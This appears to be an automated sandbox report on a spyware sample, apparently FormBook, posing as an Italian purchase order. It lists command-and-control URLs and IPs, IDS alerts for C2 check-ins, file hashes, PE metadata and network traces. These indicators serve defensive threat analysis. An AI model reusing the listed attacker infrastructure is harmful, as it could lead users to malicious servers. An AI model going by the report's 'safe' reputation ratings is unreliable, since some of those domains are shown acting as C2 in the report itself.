          http://www.awc.icu/vqh7/0%Avira URL Cloudsafe
          http://www.gachthe365.site/vqh7/?u1ua=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XyI7IXI3QKaXMg==&4sHXq=qmMaHdA-N1MF0%Avira URL Cloudsafe
          http://www.krankenzusatz.net0%Avira URL Cloudsafe
          http://www.heroclassicrally.co.uk/vqh7/-0%Avira URL Cloudsafe
          http://www.specigain.online/vqh7/0%Avira URL Cloudsafe
          http://www.hotelyeah.top0%Avira URL Cloudsafe
          http://www.readyexechub.com90%Avira URL Cloudsafe
          http://www.nativealternatives.com/vqh7/0%Avira URL Cloudsafe
          http://www.nativealternatives.comReferer:0%Avira URL Cloudsafe
          http://www.dinggubd.net0%Avira URL Cloudsafe
          http://www.heroclassicrally.co.uk/vqh7/0%Avira URL Cloudsafe
          http://www.heroclassicrally.co.ukReferer:0%Avira URL Cloudsafe
          http://www.awc.icu0%Avira URL Cloudsafe
          http://www.gachthe365.site0%Avira URL Cloudsafe
          http://www.otopodlogi.com0%Avira URL Cloudsafe
          http://www.frogair.online100%Avira URL Cloudmalware
          http://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&4sHXq=qmMaHdA-N1MF0%Avira URL Cloudsafe
          http://www.nativealternatives.com0%Avira URL Cloudsafe
          http://www.tobinrasheedja.cyou0%Avira URL Cloudsafe
          http://www.jewelryimpact.com/vqh7/?4sHXq=qmMaHdA-N1MF&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.e0%Avira URL Cloudsafe
          http://www.nkgtrust.org0%Avira URL Cloudsafe
          http://www.jewelryimpact.com/vqh7/0%Avira URL Cloudsafe
          http://www.awc.icuReferer:0%Avira URL Cloudsafe
          https://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6e0%Avira URL Cloudsafe
          http://www.tobinrasheedja.cyou/vqh7/0%Avira URL Cloudsafe
          http://www.otopodlogi.comReferer:0%Avira URL Cloudsafe
          http://www.krankenzusatz.netReferer:0%Avira URL Cloudsafe
          http://www.nkgtrust.orgReferer:0%Avira URL Cloudsafe
          http://www.krankenzusatz.net/vqh7/0%Avira URL Cloudsafe
          http://www.readyexechub.com/vqh7/0%Avira URL Cloudsafe
          http://www.frogair.online/vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MF100%Avira URL Cloudmalware
          http://www.heroclassicrally.co.uk0%Avira URL Cloudsafe
          http://www.frogair.online/vqh7/100%Avira URL Cloudmalware
          http://www.readyexechub.com0%Avira URL Cloudsafe
          http://www.hotelyeah.top/vqh7/0%Avira URL Cloudsafe
          http://www.jewelryimpact.com/vqh7/?u1ua=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeGC89HM0oMMSxg==&4sHXq=qmMaHdA-N1MF0%Avira URL Cloudsafe
          http://www.tobinrasheedja.cyouReferer:0%Avira URL Cloudsafe
          http://www.verde-amar.info0%Avira URL Cloudsafe
          http://www.specigain.online/vqh7/?u1ua=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmrZxModizUJoJg==&4sHXq=qmMaHdA-N1MF0%Avira URL Cloudsafe
          http://www.hotelyeah.top/vqh7/K6jN0%Avira URL Cloudsafe
          http://www.hotelyeah.top/vqh7/?u1ua=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcTKrDMHQPN2qJA==&4sHXq=qmMaHdA-N1MF0%Avira URL Cloudsafe
          http://www.jewelryimpact.com0%Avira URL Cloudsafe
          http://www.treebarktees.com0%Avira URL Cloudsafe
          http://www.hotelyeah.topReferer:0%Avira URL Cloudsafe
          http://www.awc.icu/vqh7/o0%Avira URL Cloudsafe
          http://www.otopodlogi.com/vqh7/0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          treebarktees.com
          103.191.208.50
          truetrue
            unknown
            krankenzusatz.net
            81.169.145.158
            truetrue
              unknown
              www.nativealternatives.com
              91.195.240.117
              truetrue
                unknown
                www.jewelryimpact.com
                81.17.18.198
                truetrue
                  unknown
                  hotelyeah.top
                  75.102.22.168
                  truetrue
                    unknown
                    gachthe365.site
                    148.251.13.126
                    truetrue
                      unknown
                      www.specigain.online
                      199.192.22.198
                      truetrue
                        unknown
                        frogair.online
                        81.169.145.72
                        truetrue
                          unknown
                          www.treebarktees.com
                          unknown
                          unknowntrue
                            unknown
                            www.hotelyeah.top
                            unknown
                            unknowntrue
                              unknown
                              www.tobinrasheedja.cyou
                              unknown
                              unknowntrue
                                unknown
                                www.gachthe365.site
                                unknown
                                unknowntrue
                                  unknown
                                  www.frogair.online
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.krankenzusatz.net
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.verde-amar.info
                                      unknown
                                      unknowntrue
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.treebarktees.com/vqh7/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.gachthe365.site/vqh7/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.gachthe365.site/vqh7/?u1ua=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XyI7IXI3QKaXMg==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.specigain.online/vqh7/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.nativealternatives.com/vqh7/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.krankenzusatz.net/vqh7/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.frogair.online/vqh7/true
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.jewelryimpact.com/vqh7/?u1ua=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeGC89HM0oMMSxg==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.frogair.online/vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.hotelyeah.top/vqh7/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.specigain.online/vqh7/?u1ua=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmrZxModizUJoJg==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.hotelyeah.top/vqh7/?u1ua=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcTKrDMHQPN2qJA==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 803902
Start date and time: 2023-02-10 12:43:10 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Requisito ordine n. 230210.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@8/2@13/8
                                                              EGA Information:
                                                              • Successful, ratio: 75%
                                                              HDC Information:
                                                              • Successful, ratio: 61% (good quality ratio 54.5%)
                                                              • Quality average: 71%
                                                              • Quality standard deviation: 32.5%
                                                              HCA Information:
                                                              • Successful, ratio: 88%
                                                              • Number of executed functions: 112
                                                              • Number of non-executed functions: 216
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, svchost.exe
                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                              • Execution Graph export aborted for target Requisito ordine n. 230210.exe, PID 5816 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • VT rate limit hit for: Requisito ordine n. 230210.exe
Time | Type | Description
12:44:23 | API Interceptor | 578x Sleep call for process: explorer.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                              Netanya Farm project (Phase II).vbsGet hashmaliciousBrowse
                                                              • www.dumpsterdave.net/al24/
                                                              Wed19b7cd8faf1.exeGet hashmaliciousBrowse
                                                              • asfaltwerk.com/upload/
                                                              Emask230921doc.exeGet hashmaliciousBrowse
                                                              • www.arthritiscompressiongloves.com/x9r4/?7n0=R48xY&c2Jp7Bc0=ATFPyyXR6WBbOtqpKjrbfg8Vw0Bv/XD6vwihZkRsadJTg49q6bOheuY+uuxUAujekOit
                                                              Yy788lmJnh.exeGet hashmaliciousBrowse
                                                              • www.dollyvee.com/b6a4/?7nIpkb=7Ma1uFfLw3XsBFAx93/nTuvNRWfdfzafPuXd0dAAaBxnPyFu4w8MLvRf45dhaXe4nkbH&-Zi=7nQl
                                                              TvDtddRoJP.exeGet hashmaliciousBrowse
                                                              • www.handelsbetriebposavec.com/if60/?i4=BP+CXvJKJ+qi+ASDTt40c+H20Oo8l6kN5b8+CsJHg+FxqtAGDNIul7ZmJPmWQrm8iARdlHjrCQ==&4hiPP=2dDdWRs
                                                              New Order Specifications.exeGet hashmaliciousBrowse
                                                              • www.ahlstromclothes.com/ssee/?LB_8RH=MhdemHby4eJzARfVnWQ6LcCJmvLgyMCJzQ3B3FORQKcf+2rLbU5Qlle6Xut7yEH71UBP&Shy=7nUtX
                                                              Abn order 55.docGet hashmaliciousBrowse
                                                              • www.daisyshouseofshade.com/bckt/?wl50w=S43CZTguyAZMFxlQfxWV8dbLMf80pI5RBqoH9J0bWWS7tq2avjd9D5aueoUBx5eNu4goIA==&eL0dq=obSpz2dXnPNlX
                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              www.jewelryimpact.comb2mb9ypaoG.exeGet hashmaliciousBrowse
                                                              • 81.17.29.148
                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              HETZNER-ASDEfl47EOJvPm.exeGet hashmaliciousBrowse
                                                              • 148.251.234.93
                                                              4Z5TqiULwM.oneGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              NKbeNpbGvc.exeGet hashmaliciousBrowse
                                                              • 148.251.234.93
                                                              qrjyNyZGJT.exeGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              JIAFF7kQzM.exeGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              prog.apkGet hashmaliciousBrowse
                                                              • 144.76.58.8
                                                              82ZpQnMRM4.exeGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              IQ02072023.jsGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              SOA 7105294.exeGet hashmaliciousBrowse
                                                              • 46.4.214.202
                                                              SOA 7105294.exeGet hashmaliciousBrowse
                                                              • 46.4.214.202
                                                              file.exeGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              file.exeGet hashmaliciousBrowse
                                                              • 144.76.136.153
                                                              273F433BA1CEBFAD830E52490A04CA744351FC4624928.exeGet hashmaliciousBrowse
                                                              • 148.251.234.93
                                                              TTRef06022301.exeGet hashmaliciousBrowse
                                                              • 88.99.90.21
                                                              TTreff2092023.exeGet hashmaliciousBrowse
                                                              • 88.99.90.21
                                                              SecureMessageAtt.htmlGet hashmaliciousBrowse
                                                              • 95.217.36.56
                                                              SoLOfA6ezK.exeGet hashmaliciousBrowse
                                                              • 116.203.231.217
                                                              file.exeGet hashmaliciousBrowse
                                                              • 148.251.234.93
                                                              file.exeGet hashmaliciousBrowse
                                                              • 148.251.234.93
                                                              Shipping Document.exeGet hashmaliciousBrowse
                                                              • 46.4.214.202
                                                              NAMECHEAP-NETUSSHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              CaixaBank_ Documento de Pago_Pdf.imgGet hashmaliciousBrowse
                                                              • 198.54.116.34
                                                              DSG2011001_INV+PL (3).exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              WKPSNTQR90002023.com.exeGet hashmaliciousBrowse
                                                              • 199.192.22.198
                                                              HSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              DSG2011001_INV+PL.exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              LISTA DE ART#U00cdCULOS.exeGet hashmaliciousBrowse
                                                              • 198.54.117.212
                                                              https://protection.greathorn.com/services/v2/lookupUrl/4392ec29-0762-4274-87b0-517ddfd9cd2a/1555/54b179ad5016a5e46356f444c9fb61bef91ba722?domain=news.pharmasalmanac.com&path=/SpecialFunctions/Newsletters/etr.aspxGet hashmaliciousBrowse
                                                              • 198.187.29.27
                                                              http://news.pharmasalmanac.com/SpecialFunctions/Newsletters/etr.aspx?urlencode=true&n=8669&s=618957&destination=http://Aims-intl.softsport24.com/Kintonl/a2ludG9ubEBhaW1zLWludGwuY29tGet hashmaliciousBrowse
                                                              • 198.187.29.27
                                                              https://powerandroid.in/now/new/Jeffdavislawfirm/manuele@jeffdavislawfirm.comGet hashmaliciousBrowse
                                                              • 198.54.116.141
                                                              JS410Y5107.exeGet hashmaliciousBrowse
                                                              • 199.192.30.193
                                                              http://us.content.exclaimer.net/?url=http%3A%2F%2Falgoma.com.paintechnology.in%3A%2F%2F?email=michael.vaz@algoma.comGet hashmaliciousBrowse
                                                              • 199.188.200.94
                                                              LIST.exeGet hashmaliciousBrowse
                                                              • 198.54.117.216
                                                              tmp112E.htmlGet hashmaliciousBrowse
                                                              • 199.192.29.215
                                                              SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              DSG2011001_INV+PL.exeGet hashmaliciousBrowse
                                                              • 192.64.115.133
                                                              captain.exeGet hashmaliciousBrowse
                                                              • 198.54.117.211
                                                              Pneumographic.exeGet hashmaliciousBrowse
                                                              • 199.192.22.198
                                                              https://email.franchisedirect.com/Prod/link-tracker?redirectUrl=http://Klp.tvparlour.com/Ae/YWVAa2xwLm5v&sig=ANcyrcQ7bCEk5Dj3E68RqaYiBGjMHqN6mSEReKLsJKq1&iat=1669043641&a=%7C%7C649518235%7C%7C&account=https://google.com&email=gyRMXpx%2BKJbHl%2BXq5LNC5w%2FoAQY7wIKwevAKcx2CvIo%3D&s=be72a29c71989238fcc9e3727911b5ee&i=10801A11253A16A137114Get hashmaliciousBrowse
                                                              • 198.54.116.52
                                                              TT SLIP.exeGet hashmaliciousBrowse
                                                              • 198.54.117.242
                                                              No context
                                                              No context
                                                              Process:C:\Users\user\Desktop\Requisito ordine n. 230210.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):226
                                                              Entropy (8bit):5.354940450065058
                                                              Encrypted:false
                                                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                              MD5:B10E37251C5B495643F331DB2EEC3394
                                                              SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                              SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                              SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):94208
                                                              Entropy (8bit):1.2882898331044472
                                                              Encrypted:false
                                                              SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                              MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                              SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                              SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                              SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:SQLite format
                                                              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.891836515716611
                                                              TrID:
                                                              • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                              • Win64 Executable GUI (202006/5) 46.43%
                                                              • Win64 Executable (generic) (12005/4) 2.76%
                                                              • Generic Win/DOS Executable (2004/3) 0.46%
                                                              • DOS Executable Generic (2002/1) 0.46%
                                                              File name:Requisito ordine n. 230210.exe
                                                              File size:734720
                                                              MD5:39f9f9780aff067b147b7adffb960c05
                                                              SHA1:30a987113262a366112c8cb91136535abba1b973
                                                              SHA256:478bd9421ff11177d8974922f1eec334f1af15845054ce1dbc42b1c9bbd4a484
                                                              SHA512:df02dc1816bc3ebb934ff10d60590691f42f752ada99803d79031dcc5d3696ce8ea773ead0e1c6f931ca608888a3faee191cf44fb4612e6ae34a29a546d361ad
                                                              SSDEEP:12288:YnG998abzi2ehUMAgpTIEIaszs0lVwpnSMFs+y65tJmtyOOgbOzARHh3qF1uguQi:Yu9pi21y5I5a+Nl6S+DJmsah3qF1ulb
                                                              TLSH:55F4020A33885F0AD84984B4C6FB1A3142F7A9977377D6897F4581E11E017E99DCBBC8
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...V.................0.................. ....@...... ....................................`...@......@............... .....
                                                              Icon Hash:00828e8e8686b000
                                                              Entrypoint:0x400000
                                                              Entrypoint Section:
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0xD115FA56 [Thu Feb 27 10:41:26 2081 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:
                                                              Instruction
                                                              dec ebp
                                                              pop edx
                                                              nop
                                                              add byte ptr [ebx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb6000 | 0x598 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb4c10 | 0x1c | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xb2c50 | 0xb2e00 | False | 0.9252789788609365 | data | 7.896625540706908 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb6000 | 0x598 | 0x600 | False | 0.416015625 | data | 4.06200688940225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_VERSION | 0xb60a0 | 0x30c | data | | |
| RT_MANIFEST | 0xb63ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | |
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 02/10/23-12:45:28.335977 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49692 | 80 | 192.168.2.3 | 148.251.13.126 |
| 02/10/23-12:45:54.046998 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 61626 | 53 | 192.168.2.3 | 8.8.8.8 |
| 02/10/23-12:44:55.405933 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49683 | 80 | 192.168.2.3 | 81.17.18.198 |
| 02/10/23-12:44:55.405933 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49683 | 80 | 192.168.2.3 | 81.17.18.198 |
| 02/10/23-12:45:28.335977 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49692 | 80 | 192.168.2.3 | 148.251.13.126 |
| 02/10/23-12:44:55.405933 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49683 | 80 | 192.168.2.3 | 81.17.18.198 |
| 02/10/23-12:45:28.335977 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49692 | 80 | 192.168.2.3 | 148.251.13.126 |
                                                              Feb 10, 2023 12:45:15.397600889 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.397612095 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397671938 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.397677898 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397737026 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397789955 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397793055 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.397850037 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397905111 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397908926 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.397962093 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.398046017 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.544486046 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.544552088 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.544606924 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.544619083 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.544656992 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.544725895 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.920188904 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:16.944451094 CET4968980192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:17.077019930 CET8049689103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:17.078807116 CET4968980192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:17.082138062 CET4968980192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:17.256587982 CET8049689103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:17.859095097 CET8049689103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:17.859854937 CET4968980192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:17.859854937 CET4968980192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:18.008632898 CET8049689103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:23.219278097 CET4969080192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:23.242948055 CET8049690148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:23.243231058 CET4969080192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:23.243403912 CET4969080192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:23.276992083 CET8049690148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:23.277045965 CET8049690148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:23.277062893 CET8049690148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:23.277185917 CET4969080192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:24.749123096 CET4969080192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:25.770337105 CET4969180192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:25.793438911 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.795167923 CET4969180192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:25.795381069 CET4969180192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:25.818365097 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818402052 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818423986 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818445921 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818460941 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818475962 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818545103 CET4969180192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:25.841502905 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:28.312261105 CET4969280192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:28.335571051 CET8049692148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:28.335752010 CET4969280192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:28.335977077 CET4969280192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:28.359148979 CET8049692148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:28.359185934 CET8049692148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:28.359209061 CET8049692148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:28.359375954 CET4969280192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:28.359615088 CET4969280192.168.2.3148.251.13.126
